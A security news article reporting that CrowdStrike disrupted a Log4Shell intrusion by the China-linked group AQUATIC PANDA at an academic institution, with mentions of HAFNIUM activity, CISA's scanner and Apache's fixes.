Crowdstrike witnessed a Chinese espionage group, AQUATIC PANDA, using the Log4j bug (dubbed Log4Shell) to attack an unnamed academic institution.
The Crowdstrike Falcon OverWatch team uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMWare Horizon instance at a large academic institution. The company didn’t name the institution but noted that it was able to disrupt an ‘active hands-on intrusion.’
The CrowdStrike Intelligence team linked the infrastructure used in the attempted hack to the threat actor known as AQUATIC PANDA. According to researchers, it is a China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage.
AQUATIC PANDA relies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as FishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.
“Throughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” the company said.
This is not the first time China-linked threat actors are found exploiting the vulnerability. For example, Microsoft has observed HAFNIUM, a threat actor group operating out of China, utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. HAFNIUM-associated systems were observed using a DNS service typically associated with the testing activity to fingerprint systems.
The Cybersecurity and Infrastructure Security Agency (CISA) recently published an open-sourced log4j-scanner, designed to help organizations identify potentially vulnerable web services affected by the Log4j vulnerabilities.
Meanwhile, Apache has already issued updates fixing five Log4j vulnerabilities.